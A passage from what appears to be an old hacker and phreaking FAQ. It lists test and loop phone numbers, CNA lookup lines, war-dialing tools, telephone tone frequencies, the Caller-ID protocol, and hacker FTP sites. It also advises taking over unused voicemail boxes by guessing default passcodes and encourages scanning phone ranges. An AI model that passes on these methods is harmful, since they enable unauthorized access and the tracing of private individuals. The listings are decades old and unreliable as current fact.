  8333.   313  272-9996  272-9997
  8334.   313  273-9996  273-9997
  8335.   313  277-9996  277-9997
  8336.   313  281-9996  281-9997
  8337.   313  292-9996  292-9997
  8338.   313  299-9996  299-9997
  8339.   313  321-9996  321-9997
  8340.   313  326-9996  326-9997
  8341.   313  356-9996  356-9997
  8342.   313  362-9996  362-9997
  8343.   313  369-9996  369-9997
  8344.   313  388-9996  388-9997
  8345.   313  397-9996  397-9997
  8346.   313  399-9996  399-9997
  8347.   313  445-9996  445-9997
  8348.   313  465-9996  465-9997
  8349.   313  471-9996  471-9997
  8350.   313  474-9996  474-9997
  8351.   313  477-9996  477-9997
  8352.   313  478-9996  478-9997
  8353.   313  483-9996  483-9997
  8354.   313  497-9996  497-9997
  8355.   313  526-9996  526-9997
  8356.   313  552-9996  552-9997
  8357.   313  556-9996  556-9997
  8358.   313  561-9996  561-9997
  8359.   313  569-9996  569-9996
  8360.   313  575-9996  575-9997
  8361.   313  577-9996  577-9997
  8362.   313  585-9996  585-9997
  8363.   313  591-9996  591-9997
  8364.   313  621-9996  621-9997
  8365.   313  626-9996  626-9997
  8366.   313  644-9996  644-9997
  8367.   313  646-9996  646-9997
  8368.   313  647-9996  647-9997
  8369.   313  649-9996  649-9997
  8370.   313  663-9996  663-9997
  8371.   313  665-9996  665-9997
  8372.   313  683-9996  683-9997
  8373.   313  721-9996  721-9997
  8374.   313  722-9996  722-9997
  8375.   313  728-9996  728-9997
  8376.   313  731-9996  731-9997
  8377.   313  751-9996  751-9997
  8378.   313  776-9996  776-9997
  8379.   313  781-9996  781-9997
  8380.   313  787-9996  787-9997
  8381.   313  822-9996  822-9997
  8382.   313  833-9996  833-9997
  8383.   313  851-9996  851-9997
  8384.   313  871-9996  871-9997
  8385.   313  875-9996  875-9997
  8386.   313  886-9996  886-9997
  8387.   313  888-9996  888-9997
  8388.   313  898-9996  898-9997
  8389.   313  934-9996  934-9997
  8390.   313  942-9996  942-9997
  8391.   313  963-9996  963-9997
  8392.   313  977-9996  977-9997
  8393.   315  673-9995  673-9996
  8394.   315  695-9995  695-9996
  8395.   402  422-0001  422-0002
  8396.   402  422-0003  422-0004
  8397.   402  422-0005  422-0006
  8398.   402  422-0007  422-0008
  8399.   402  572-0003  572-0004
  8400.   402  779-0004  779-0007
  8401.   406  225-9902  225-9903
  8402.   517  422-9996  422-9997
  8403.   517  423-9996  423-9997
  8404.   517  455-9996  455-9997
  8405.   517  563-9996  563-9997
  8406.   517  663-9996  663-9997
  8407.   517  851-9996  851-9997
  8408.   609  921-9929  921-9930
  8409.   609  994-9929  994-9930
  8410.   616  997-9996  997-9997
  8411.   708  724-9951  724-????
  8412.   713  224-1499  759-1799
  8413.   713  324-1499  324-1799
  8414.   713  342-1499  342-1799
  8415.   713  351-1499  351-1799
  8416.   713  354-1499  354-1799
  8417.   713  356-1499  356-1799
  8418.   713  442-1499  442-1799
  8419.   713  447-1499  447-1799
  8420.   713  455-1499  455-1799
  8421.   713  458-1499  458-1799
  8422.   713  462-1499  462-1799
  8423.   713  466-1499  466-1799
  8424.   713  468-1499  468-1799
  8425.   713  469-1499  469-1799
  8426.   713  471-1499  471-1799
  8427.   713  481-1499  481-1799
  8428.   713  482-1499  482-1799
  8429.   713  484-1499  484-1799
  8430.   713  487-1499  487-1799
  8431.   713  489-1499  489-1799
  8432.   713  492-1499  492-1799
  8433.   713  493-1499  493-1799
  8434.   713  524-1499  524-1799
  8435.   713  526-1499  526-1799
  8436.   713  555-1499  555-1799
  8437.   713  661-1499  661-1799
  8438.   713  664-1499  664-1799
  8439.   713  665-1499  665-1799
  8440.   713  666-1499  666-1799
  8441.   713  667-1499  667-1799
  8442.   713  682-1499  976-1799
  8443.   713  771-1499  771-1799
  8444.   713  780-1499  780-1799
  8445.   713  781-1499  997-1799
  8446.   713  960-1499  960-1799
  8447.   713  977-1499  977-1799
  8448.   713  988-1499  988-1799
  8449.   805  528-0044  528-0045
  8450.   805  544-0044  544-0045
  8451.   805  773-0044  773-0045
  8452.   808  235-9907  235-9908
  8453.   808  239-9907  239-9908
  8454.   808  245-9907  245-9908
  8455.   808  247-9907  247-9908
  8456.   808  261-9907  261-9908
  8457.   808  322-9907  322-9908
  8458.   808  328-9907  328-9908
  8459.   808  329-9907  329-9908
  8460.   808  332-9907  332-9908
  8461.   808  335-9907  335-9908
  8462.   808  572-9907  572-9908
  8463.   808  623-9907  623-9908
  8464.   808  624-9907  624-9908
  8465.   808  668-9907  668-9908
  8466.   808  742-9907  742-9908
  8467.   808  879-9907  879-9908
  8468.   808  882-9907  882-9908
  8469.   808  885-9907  885-9908
  8470.   808  959-9907  959-9908
  8471.   808  961-9907  961-9908
  8472.   810  362-9996  362-9997
  8473.   813  385-9971  385-xxxx
  8474.   908  254-9929  254-9930
  8475.   908  558-9929  558-9930
  8476.   908  560-9929  560-9930
  8477.   908  776-9930  776-9930
  8478.  
  8479.  
  8480. 16. What is a CNA number?
  8481.  
  8482. CNA stands for Customer Name and Address.  The CNA number is a phone
  8483. number for telephone company personnel to call and get the name and
  8484. address for a phone number.  If a telephone lineman finds a phone line
  8485. he does not recognize, he can use the ANI number to find it's phone
  8486. number and then call the CNA operator to see who owns it and where
  8487. they live.
  8488.  
  8489. Normal CNA numbers are available only to telephone company personnel.
  8490. Private citizens may legally get CNA information from private
  8491. companies.  Two such companies are:
  8492.  
  8493. Unidirectory    (900)933-3330
  8494. Telename        (900)884-1212
  8495.  
  8496. Note that these are 900 numbers, and will cost you approximately one
  8497. dollar per minute.
  8498.  
  8499. If you are in 312 or 708, AmeriTech has a pay-for-play CNA service
  8500. available to the general public.  The number is 796-9600.  The cost is
  8501. $.35/call and can look up two numbers per call.
  8502.  
  8503. If you are in 415, Pacific Bell offers a public access CNA service at
  8504. (415)781-5271.
  8505.  
  8506. An interesting number is The House of Windsor Collection at
  8507. (800)433-3210.  If you dial it and press 1 to request a catalog, it
  8508. will ask for your telephone number.  If will then tell you the street
  8509. name of any telephone number you enter.
  8510.  
  8511.  
  8512. 17. What is the telephone company CNA number for my area?
  8513.  
  8514. 203  203-771-8080     CT
  8515. 516  516-321-5700     Hempstead/Long Island, NY
  8516. 614  614-464-0123     Columbus/Steubenville, OH
  8517. 813  813-270-8711     Ft. Meyers/St. Petersburg/Tampa, FL
  8518. 513  513-397-9110     Cincinnati/Dayton, OH
  8519.  
  8520.  
  8521. 18. What are some numbers that always ring busy?
  8522.  
  8523.   216  xxx-9887              Akron/Canton/Cleveland/Lorain/Youngstown, OH
  8524.   303  431-0000              Denver, CO
  8525.   303  866-8660              Denver, CO
  8526.   316  952-7265              Dodge City/Wichita, KS
  8527.   501  377-99xx              AR
  8528.   719  472-3773              Colorado Springs/Leadville/Pueblo, CO
  8529.   805  255-0699              Bakersfield/Santa Barbara, CA
  8530.   818  885-0699              Pasadena, CA
  8531.   906  632-9999              Marquette/Sault Ste. Marie, MI
  8532.   906  635-9999              Marquette/Sault Ste. Marie, MI
  8533.   914  576-9903              Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  8534.  
  8535.  
  8536. 19. What are some numbers that temporarily disconnect phone service?
  8537.  
  8538.   314  511        Columbia/Jefferson City/St.Louis, MO (1 minute)
  8539.   404  420        Atlanta, GA                          (5 minutes)
  8540.   405  953        Enid/Oklahoma City, OK               (1 minute)
  8541.   407  511        Orlando/West Palm Beach, FL          (1 minute)
  8542.   512  200        Austin/Corpus Christi, TX            (1 minute)
  8543.   516  480        Hempstead/Long Island, NY            (1 minute)
  8544.   603  980        NH
  8545.   614  xxx-9894   Columbus/Steubenville, OH
  8546.   805  119        Bakersfield/Santa Barbara, CA        (3 minutes)
  8547.   919  211 or 511 Durham, NC                           (10 min - 1 hour)
  8548.  
  8549.  
  8550. 20. What is scanning?
  8551.  
  8552. Scanning is dialing a large number of telephone numbers in the hope
  8553. of finding interesting carriers (computers) or tones.
  8554.  
  8555. Scanning can be done by hand, although dialing several thousand
  8556. telephone numbers by hand is extremely boring and takes a long time.
  8557.  
  8558. Much better is to use a scanning program, sometimes called a war
  8559. dialer or a demon dialer.  Currently, the best war dialer available to
  8560. PC-DOS users is ToneLoc from Minor Threat and Mucho Maas.  ToneLoc can
  8561. be ftp'd from ftp.paranoia.com /pub/toneloc/.
  8562.  
  8563. A war dialer will dial a range of numbers and log what it finds at
  8564. each number.  You can then only dial up the numbers that the war
  8565. dialer marked as carriers or tones.
  8566.  
  8567.  
  8568. 21. Is scanning illegal?
  8569.  
  8570. Excerpt from: 2600, Spring 1990, Page 27:
  8571.  
  8572. -BQ-
  8573. In some places, scanning has been made illegal.  It would be hard,
  8574. though, for someone to file a complaint against you for scanning since
  8575. the whole purpose is to call every number once and only once.  It's
  8576. not likely to be thought of as harassment by anyone who gets a single
  8577. phone call from a scanning computer.  Some central offices have been
  8578. known to react strangely when people start scanning.  Sometimes you're
  8579. unable to get a dialtone for hours after you start scanning.  But
  8580. there is no uniform policy.  The best thing to do is to first find out
  8581. if you've got some crazy law saying you can't do it.  If, as is
  8582. likely, there is no such law, the only way to find out what happens is
  8583. to give it a try.
  8584. -EQ-
  8585.  
  8586. It should be noted that a law making scanning illegal was recently
  8587. passed in Colorado Springs, CO.  It is now illegal to place a call
  8588. in Colorado Springs without the intent to communicate.
  8589.  
  8590.  
  8591. 22. Where can I purchase a lineman's handset?
  8592.  
  8593. Contact East
  8594. 335 Willow Street
  8595. North Andover, MA 01845-5995
  8596. (508)682-2000
  8597.  
  8598. Jensen Tools
  8599. 7815 S. 46th Street
  8600. Phoenix, AZ 85044-5399
  8601.  
  8602. Time Motion Tools
  8603. 12778 Brookprinter Place
  8604. Poway, CA 92064
  8605. (619)679-0303
  8606.  
  8607.  
  8608. 23. What are the DTMF frequencies?
  8609.  
  8610. DTMF stands for Dual Tone Multi Frequency.  These are the tones you
  8611. get when you press a key on your telephone touchpad.  The tone of the
  8612. button is the sum of the column and row tones.  The ABCD keys do not
  8613. exist on standard telephones.
  8614.  
  8615.      1209 1336 1477 1633
  8616.  
  8617.      697   1    2    3    A
  8618.  
  8619.      770   4    5    6    B
  8620.  
  8621.      852   7    8    9    C
  8622.  
  8623.      941   *    0    #    D
  8624.  
  8625.  
  8626. 24. What are the frequencies of the telephone tones?
  8627.  
  8628. Type                Hz          On      Off
  8629. ---------------------------------------------------------------------
  8630. Dial Tone         350 & 400     ---     ---
  8631. Busy Signal       480 & 620     0.5     0.5
  8632. Toll Congestion   480 & 620     0.2     0.3
  8633. Ringback (Normal) 440 & 480     2.0     4.0
  8634. Ringback (PBX)    440 & 480     1.5     4.5
  8635. Reorder (Local)   480 & 620     3.0     2.0
  8636. Invalid Number    200 & 400
  8637. Hang Up Warning 1400 & 2060     0.1     0.1
  8638. Hang Up         2450 & 2600     ---     ---
  8639.  
  8640.  
  8641. 25. What are all of the * (LASS) codes?
  8642.  
  8643. Local Area Signalling Services (LASS) and Custom Calling Feature
  8644. Control Codes:
  8645.  
  8646. (These appear to be standard, but may be changed locally)
  8647.  
  8648. Service                     Tone    Pulse/rotary   Notes
  8649. --------------------------------------------------------------------------
  8650. Assistance/Police           *12         n/a        [1]
  8651. Cancel forwarding           *30         n/a        [C1]
  8652. Automatic Forwarding        *31         n/a        [C1]
  8653. Notify                      *32         n/a        [C1] [2]
  8654. Intercom Ring 1 (..)        *51         1151       [3]
  8655. Intercom Ring 2 (.._)       *52         1152       [3]
  8656. Intercom Ring 3 (._.)       *53         1153       [3]
  8657. Extension Hold              *54         1154       [3]
  8658. Customer Originated Trace   *57         1157
  8659. Selective Call Rejection    *60         1160       (or Call Screen)
  8660. Selective Distinct Alert    *61         1161
  8661. Selective Call Acceptance   *62         1162
  8662. Selective Call Forwarding   *63         1163
  8663. ICLID Activation            *65         1165
  8664. Call Return (outgoing)      *66         1166
  8665. Number Display Blocking     *67         1167       [4]
  8666. Computer Access Restriction *68         1168
  8667. Call Return (incoming)      *69         1169
  8668. Call Waiting disable        *70         1170       [4]
  8669. No Answer Call Transfer     *71         1171
  8670. Usage Sensitive 3 way call  *71         1171
  8671. Call Forwarding: start      *72 or 72#  1172
  8672. Call Forwarding: cancel     *73 or 73#  1173
  8673. Speed Calling (8 numbers)   *74 or 74#  1174
  8674. Speed Calling (30 numbers)  *75 or 75#  1175
  8675. Anonymous Call Rejection    *77         1177       [5] [M: *58]
  8676. Call Screen Disable         *80         1160       (or Call Screen) [M: *50]
  8677. Selective Distinct Disable  *81         1161       [M: *51]
  8678. Select. Acceptance Disable  *82         1162
  8679. Select. Forwarding Disable  *83         1163       [M: *53]
  8680. ICLID Disable               *85         1165
  8681. Call Return (cancel out)    *86         1186       [6] [M: *56]
  8682. Anon. Call Reject (cancel)  *87         1187       [5] [M: *68]
  8683. Call Return (cancel in)     *89         1189       [6] [M: *59]
  8684.  
  8685. Notes:
  8686.  
  8687. [C1]     - Means code used for Cellular One service
  8688. [1]      - for cellular in Pittsburgh, PA A/C 412 in some areas
  8689. [2]      - indicates that you are not local and maybe how to reach you
  8690. [3]      - found in Pac Bell territory; Intercom ring causes a distinctive
  8691.            ring to be generated on the current line; Hold keeps a call
  8692.            connected until another extension is picked up
  8693. [4]      - applied once before each call
  8694. [5]      - A.C.R. blocks calls from those who blocked Caller ID
  8695.            (used in C&P territory, for instance)
  8696. [6]      - cancels further return attempts
  8697. [M: *xx] - alternate code used for MLVP (multi-line variety package)
  8698.            by Bellcore. It goes by different names in different RBOCs.
  8699.            In Bellsouth it is called Prestige. It is an arrangement of
  8700.            ESSEX like features for single or small multiple line groups.
  8701.  
  8702.            The reason for different codes for some features in MLVP is that
  8703.            call-pickup is *8 in MLVP so all *8x codes are reaasigned *5x
  8704.  
  8705.  
  8706. 26. What frequencies do cordless phones operate on?
  8707.  
  8708. Here are the frequencies for the first generation 46/49mhz phones.
  8709. The new 900mhz cordless phones are not covered.
  8710.  
  8711. Channel    Handset Transmit    Base Transmit
  8712. -------    ----------------    -------------
  8713.    1          49.670mhz          46.610mhz
  8714.    2          49.845             46.630
  8715.    3          49.860             46.670
  8716.    4          49.770             46.710
  8717.    5          49.875             46.730
  8718.    6          49.830             46.770
  8719.    7          49.890             46.830
  8720.    8          49.930             46.870
  8721.    9          49.990             46.930
  8722.   10          49.970             46.970
  8723.  
  8724.  
  8725. 27. What is Caller-ID?
  8726.  
  8727. This FAQ answer is stolen from Rockewell:
  8728.  
  8729. Calling Number Delivery (CND), better known as Caller ID, is a
  8730. telephone service intended for residential and small business
  8731. customers.  It allows the called Customer Premises Equipment (CPE) to
  8732. receive a calling party's directory number and the date and time of
  8733. the call during the first 4 second silent interval in the ringing
  8734. cycle.
  8735.  
  8736. Parameters
  8737. ~~~~~~~~~~
  8738. The data signalling interface has the following characteristics:
  8739.  
  8740.         Link Type:                              2-wire, simplex
  8741.     Transmission Scheme:        Analog, phase-coherent FSK
  8742.     Logical 1 (mark)            1200 +/- 12 Hz
  8743.     Logical 0 (space)            2200 +/- 22 Hz
  8744.     Transmission Rate:            1200 bps
  8745.     Transmission Level:            13.5 +/- dBm into 900 ohm load
  8746.  
  8747.  
  8748. Protocol
  8749. ~~~~~~~~
  8750. The protocol uses 8-bit data words (bytes), each bounded by a start
  8751. bit and a stop bit.  The CND message uses the Single Data Message
  8752. format shown below.
  8753.  
  8754. | Channel  |  Carrier  |  Message  |  Message  |  Data       | Checksum |
  8755. | Seizure  |  Signal   |  Type     |  Length   |  Word(s)    | Word     |
  8756. | Signal   |           |  Word     |  Word     |             |          |
  8757.  
  8758. Channel Siezure Signal
  8759. ~~~~~~~~~~~~~~~~~~~~~~
  8760. The channel seizure is 30 continuous bytes of 55h (01010101) providing
  8761. a detectable alternating function to the CPE (i.e. the modem data
  8762. pump).
  8763.  
  8764. Carrier Signal
  8765. ~~~~~~~~~~~~~~
  8766. The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to
  8767. condition the receiver for data.
  8768.  
  8769. Message Type Word
  8770. ~~~~~~~~~~~~~~~~~
  8771. The message type word indicates the service and capability associated
  8772. with the data message.  The message type word for CND is 04h
  8773. (00000100).
  8774.  
  8775. Message Length Word
  8776. ~~~~~~~~~~~~~~~~~~~
  8777. The message length word specifies the total number of data words to
  8778. follow.
  8779.  
  8780. Data Words
  8781. ~~~~~~~~~~
  8782. The data words are encoded in ASCII and represent the following
  8783. information:
  8784.  
  8785. o  The first two words represent the month
  8786. o  The next two words represent the day of the month
  8787. o  The next two words represent the hour in local military time
  8788. o  The next two words represent the minute after the hour
  8789. o  The calling party's directory number is represented by the
  8790.    remaining  words in the data word field
  8791.  
  8792. If the calling party's directory number is not available to the
  8793. terminating central office, the data word field contains an ASCII "O".
  8794. If the calling party invokes the privacy capability, the data word
  8795. field contains an ASCII "P".
  8796.  
  8797. Checksum Word
  8798. ~~~~~~~~~~~~~
  8799. The Checksum Word contains the twos complement of the modulo 256 sum
  8800. of the other words in the data message (i.e., message type, message
  8801. length, and data words).  The receiving equipment may calculate the
  8802. modulo 256 sum of the received words and add this sum to the reveived
  8803. checksum word.  A result of zero generally indicates that the message
  8804. was correctly received.  Message retransmission is not supported.
  8805.  
  8806. Example CNS Single Data Message
  8807. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8808. An example of a received CND message, beginning with the message type
  8809. word, follows:
  8810.  
  8811. 04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51
  8812.  
  8813. 04h=  Calling number delivery information code (message type word)
  8814. 12h=  18 decimal; Number of data words (date,time, and directory
  8815.       number words)
  8816. ASCII 30,39= 09; September
  8817. ASCII 33,30= 30; 30th day
  8818. ASCII 31,32= 12; 12:00 PM
  8819. ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM)
  8820. ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling
  8821.       party's directory number
  8822. 51h=  Checksum Word
  8823.  
  8824. Data Access Arrangement (DAA) Requirements
  8825. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8826. To receive CND information, the modem monitors the phone line between
  8827. the first and second ring bursts without causing the DAA to go off
  8828. hook in the conventional sense, which would inhibit the transmission
  8829. of CND by the local central office.  A simple modification to an
  8830. existing DAA circuit easily accomplishes the task.
  8831.  
  8832. Modem Requirements
  8833. ~~~~~~~~~~~~~~~~~~
  8834. Although the data signalling interface parameters match those of a
  8835. Bell 202 modem, the receiving CPE need not be a Bell 202 modem.  A
  8836. V.23 1200 bps modem receiver may be used to demodulate the Bell 202
  8837. signal.  The ring indicate bit (RI) may be used on a modem to indicate
  8838. when to monitor the phone line for CND information.  After the RI bit
  8839. sets, indicating the first ring burst, the host waits for the RI bit
  8840. to reset.  The host then configures the modem to monitor the phone
  8841. line for CND information.
  8842.  
  8843. Signalling
  8844. ~~~~~~~~~~
  8845. According to Bellcore specifications, CND signalling starts as early
  8846. as 300 mS after the first ring burst and ends at least 475 mS before
  8847. the second ring burst
  8848.  
  8849. Applications
  8850. ~~~~~~~~~~~~
  8851. Once CND information is received the user may process the information
  8852. in a number of ways.
  8853.  
  8854. 1.  The date, time, and calling party's directory number can be
  8855.     displayed.
  8856.  
  8857. 2.  Using a look-up table, the calling party's directory number can be
  8858.     correlated with his or her name and the name displayed.
  8859.  
  8860. 3.  CND information can also be used in additional ways such as for:
  8861.  
  8862.     a.  Bulletin board applications
  8863.     b.  Black-listing applications
  8864.     c.  Keeping logs of system user calls, or
  8865.     d.  Implementing a telemarketing data base
  8866.  
  8867. References
  8868. ~~~~~~~~~~
  8869. For more information on Calling Number Delivery (CND), refer to
  8870. Bellcore publications TR-TSY-000030 and TR-TSY-000031.
  8871.  
  8872. To obtain Bellcore documents contact:
  8873.  
  8874.     Bellcore Customer Service
  8875.     60 New England Avenue, Room 1B252
  8876.     Piscataway, NJ   08834-4196
  8877.     (908) 699-5800
  8878.  
  8879.  
  8880. 28. What is a PBX?
  8881.  
  8882. A PBX is a Private Branch Exchange.  A PBX is a small telephone switch
  8883. owned by a company or organization.  Let's say your company has a
  8884. thousand employees.  Without a PBX, you would need a thousand phone
  8885. lines.  However, only 10% of your employees are talking on the phone
  8886. at one time.  What if you had a computer that automatically found an
  8887. outside line every time one of your employees picked up the telephone.
  8888. With this type of system, you could get by with only paying for one
  8889. hundred phone lines.  This is a PBX.
  8890.  
  8891.  
  8892. 29. What is a VMB?
  8893.  
  8894. A VMB is a Voice Mail Box.  A VMB is a computer that acts as an
  8895. answering machine for hundreds or thousands of users.  Each user will
  8896. have their own Voice Mail Box on the system.  Each mail box will have
  8897. a box number and a pass code.
  8898.  
  8899. Without a passcode, you will usually be able to leave messages to
  8900. users on the VMB system.  With a passcode, you can read messages and
  8901. administer a mailbox.  Often, mailboxes will exist that were created
  8902. by default or are no longer used.  These mailboxes may be taken over
  8903. by guessing their passcode.  Often the passcode will be the mailbox
  8904. number or a common number such as 1234.
  8905.  
  8906.  
  8907.  
  8908.  
  8909.  
  8910. Section C: Resources
  8911. ~~~~~~~~~~~~~~~~~~~~
  8912.  
  8913. 01. What are some ftp sites of interest to hackers?
  8914.  
  8915.   198.69.103.23                                           (Mac)
  8916.   aeneas.mit.edu
  8917.   alex.sp.cs.cmu.edu      /links/security                 (Misc)
  8918.   alife.santafe.edu
  8919.   aql.gatech.edu          /pub                            (40Hex)
  8920.   asylum.sf.ca.us
  8921.   athena-dist.mit.edu     /pub/ATHENA                     (Athena Project)
  8922.   atlantis.utmb.edu
  8923.   bellcore.com                                            (Bellcore)
  8924.   camelot.usc.edu         /pub/cellular/DDIinfodemo       (Cellular)
  8925.   cert.org                                                (CERT)
  8926.   ciac.llnl.gov
  8927.   coast.cs.purdue.edu     /pub                            (Security/COAST)
  8928.   csrc.ncsl.nist.gov
  8929.   dartmouth.edu           /pub/security                   (Security)
  8930.   dg-rtp.dg.com
  8931.   ds.internic.net
  8932.   enlow.com
  8933.   ftp.3com.com            /mirrors/zip                    (ZipCrypt)
  8934.   ftp.3com.com            /Orange-Book                    (Orange Book)
  8935.   ftp.acns.nwu.edu
  8936.   ftp.alantec.com
  8937.   ftp.armory.com          /pub/user/kmartind              (H/P)
  8938.   ftp.armory.com          /pub/user/swallow
  8939.   ftp.c3.lanl.gov
  8940.   ftp.cc.rochester.edu
  8941.   ftp.cert.dfn.de                                         (FIRST)
  8942.   ftp.cic.net             /pub/e-serials/alphabetic/p/phrack (Zines)
  8943.   ftp.cisco.com
  8944.   ftp.clark.net           /pub/jcase                      (H/P)
  8945.   ftp.cnam.fr
  8946.   ftp.commerce.net        /pubs/standards/drafts/shttp.txt(Secure HyperText)
  8947.   ftp.cs.colorado.edu
  8948.   ftp.cs.ruu.nl
  8949.   ftp.cs.uwm.edu          /pub/comp-privacy               (Privacy Digest)
  8950.   ftp.cs.vu.nl
  8951.   ftp.cs.yale.edu
  8952.   ftp.csl.sri.com         /pub/nides                      (SRI)
  8953.   ftp.csua.berkeley.edu   /pub/cypherpunks                (Crypto)
  8954.   ftp.cyberspace.com      /pub/archive/defcon             (PhoneTag)
  8955.   ftp.delmarva.com
  8956.   ftp.dsi.unimi.it
  8957.   ftp.ee.lbl.gov
  8958.   ftp.eff.org             /pub/Publications/CuD           (EFF)
  8959.   ftp.elelab.nsc.co.jp    /pub/security                   (Security)
  8960.   ftp.etext.org                                           (Etext)
  8961.   ftp.fc.net              /pub/defcon                     (DefCon)
  8962.   ftp.fc.net              /pub/defcon/BBEEP               (BlueBeep)
  8963.   ftp.fc.net              /pub/phrack                     (Phrack Magazine)
  8964.   ftp.fc.net              /pub/phrack/underground         (Hacker Archives)
  8965.   ftp.fh-berlin.de
  8966.   ftp.foobar.com
  8967.   ftp.funet.fi
  8968.   ftp.gate.net            /pub/users/laura
  8969.   ftp.gate.net            /pub/users/wakko
  8970.   ftp.greatcircle.com     /pub/firewalls                  (Firewalls)
  8971.   ftp.halcyon.com         /pub/cud                        (Zines)
  8972.   ftp.IEunet.ie           /pub/security                   (Security)
  8973.   ftp.ifi.uio.no
  8974.   ftp.info.fundp.ac.be
  8975.   ftp.informatik.uni-hamburg.de
  8976.   ftp.inoc.dl.nec.com     /pub/security                   (Security)
  8977.   ftp.isi.edu
  8978.   ftp.llnl.gov            /pub                            (CIAC)
  8979.   ftp.lysator.liu.se
  8980.   ftp.mcs.com             /mcsnet.users/crisadm           (Virii)
  8981.   ftp.near.net            /security/archives/phrack       (Zines)
  8982.   ftp.nec.com
  8983.   ftp.netcom.com          /pub/br/bradleym                (Virii)
  8984.   ftp.netcom.com          /pub/da/daemon9
  8985.   ftp.netcom.com          /pub/va/vandal                  (DnA)
  8986.   ftp.netcom.com          /pub/zz/zzyzx                   (H/P)
  8987.   ftp.netsys.com
  8988.   ftp.ocs.mq.edu.au       /PC/Crypt                       (Crypto)
  8989.   ftp.paranoia.com        /pub/toneloc/tl110.zip          (ToneLoc)
  8990.   ftp.pop.psu.edu
  8991.   ftp.primus.com          /pub/armchair                   (Phoney)
  8992.   ftp.primus.com          /pub/security                   (Security)
  8993.   ftp.psy.uq.oz.au
  8994.   ftp.rahul.net           /pub/lps                        (Home of the FAQ)
  8995.   ftp.sert.edu.au
  8996.   ftp.sgi.com
  8997.   ftp.std.com             /archives/alt.locksmithing      (Locksmithing)
  8998.   ftp.std.com             /obi/Mischief/                  (MIT Guide to Locks)
  8999.   ftp.std.com             /obi/Phracks                    (Zines)
  9000.   ftp.sunet.se            /pub/network/monitoring         (Ethernet sniffers)
  9001.   ftp.sura.net            /pub/security                   (SURAnet)
  9002.   ftp.technet.sg
  9003.   ftp.tis.com             /pub                            (TIS)
  9004.   ftp.uspto.gov
  9005.   ftp.uu.net              /doc/literary/obi/Phracks       (Zines)
  9006.   ftp.uwp.edu                                             (Copy protection)
  9007.   ftp.vis.colostate.edu
  9008.   ftp.vix.com
  9009.   ftp.vortex.com
  9010.   ftp.warwick.ac.uk       /pub/cud                        (Zines)
  9011.   ftp.win.tue.nl          /pub/security                   (Security)
  9012.   ftp.winternet.com       /users/craigb                   (H/P)
  9013.   ftp.wustl.edu           /doc/EFF                        (EFF)
  9014.   furmint.nectar.cs.cmu.edu /security                     (Crypto)
  9015.   garbo.uwasa.fi          /pc/crypt                       (Crypto)
  9016.   gumby.dsd.trw.com
  9017.   hplyot.obspm.fr
  9018.   info.mcs.anl.gov
  9019.   jerico.usc.edu
  9020.   lcs.mit.edu             /telecom-archives               (Telecom archives)
  9021.   lod.amaranth.com                                        (Legion of Doom)
  9022.   l0pht.com                                               (The L0pht)
  9023.   mac.archive.umich.edu
  9024.   mary.iia.org            /pub/users/patriot              (Misc)
  9025.   monet.ccs.itd.umich.edu
  9026.   net.tamu.edu            /pub/security/TAMU              (Security)
  9027.   net23.com               /pub                            (Max Headroom)
  9028.   nic.ddn.mil             /scc                            (DDN Security)
  9029.   nic.funet.fi            /pub/doc/cud                    (Zines)
  9030.   oak.oakland.edu
  9031.   paradox1.denver.colorado.edu  /anonymous/text-files/pyrotechnics (Pyro)
  9032.   parcftp.xerox.com
  9033.   pyrite.rutgers.edu      /pub/security                   (Security)
  9034.   relay.cs.toronto.edu    /doc/telecom-archives           (Telecom)
  9035.   rena.dit.co.jp          /pub/security                   (Security)
  9036.   research.att.com        /dist/internet_security         (AT&T)
  9037.   ripem.msu.edu           /pub/crypt                      (Ripem)
  9038.   rs1.rrz.uni-koeln.de                                    (Wordlists)
  9039.   rtfm.mit.edu                                            (Etext)
  9040.   rtfm.mit.edu            /pub/usenet-by-group            (Usenet FAQ's)
  9041.   sable.ox.ac.uk                                          (Wordlists)
  9042.   samadams.princeton.edu
  9043.   scss3.cl.msu.edu        /pub/crypt                      (Crypto)
  9044.   sierra.stanford.edu
  9045.   spy.org                                                 (CSC)
  9046.   suburbia.apana.org.au   /pub/unix/security              (Security)
  9047.   sunsolve1.sun.com
  9048.   tam.cs.ucdavis.edu
  9049.   technion.ac.il
  9050.   theta.iis.u-tokyo.ac.jp /pub1/security                  (Security)
  9051.   thumper.bellcore.com
  9052.   titania.mathematik.uni-ulm.de /pub/security             (Security)
  9053.   toxicwaste.mit.edu      /pub/rsa129/README              (Breaking RSA)
  9054.   uceng.uc.edu            /pub/kerberos.documentation     (Kerberos)
  9055.   ugle.unit.no
  9056.   vic.cc.purdue.edu
  9057.   whacked.l0pht.com                                       (Mac + H/P)
  9058.   wimsey.bc.ca            /pub/crypto                     (Crypto)
  9059.  
  9060.  
  9061. 02. What are some fsp sites of interest to hackers?
  9062.  
  9063.   Third Stone From the Sun  132.241.180.91 6969
  9064.  
  9065.  
  9066. 03. What are some newsgroups of interest to hackers?
  9067.  
  9068.   alt.2600                Do it 'til it hertz
  9069.   alt.2600.hope.tech      Technology concerns for Hackers on Planet Earth 1994
  9070.   alt.cellular
  9071.   alt.cellular-phone-tech
  9072.   alt.comp.virus
  9073.   alt.cyberpunk           High-tech low-life.
  9074.   alt.cyberspace          Cyberspace and how it should work.
  9075.   alt.dcom.telecom        Discussion of telecommunications technology
  9076.   alt.engr.explosives     [no description available]
  9077.   alt.hackers             Descriptions of projects currently under development
  9078.   alt.locksmithing        You locked your keys in *where*?
  9079.   alt.hackers.malicious   The really bad guys - don't take candy from them
  9080.   alt.ph.uk
  9081.   alt.privacy.anon-server Tech. & policy matters of anonymous contact servers
  9082.   alt.radio.pirate        Hide the gear, here comes the magic station-wagons.
  9083.   alt.radio.scanner       Discussion of scanning radio receivers.
  9084.   alt.satellite.tv.europe
  9085.   alt.security            Security issues on computer systems
  9086.   alt.security.index      Pointers to good stuff in misc.security (Moderated)
  9087.   alt.security.keydist    Exchange of keys for public key encryption systems
  9088.   alt.security.pgp        The Pretty Good Privacy package
  9089.   alt.security.ripem      A secure email system illegal to export from the US
  9090.   comp.dcom.cellular      [no description available]
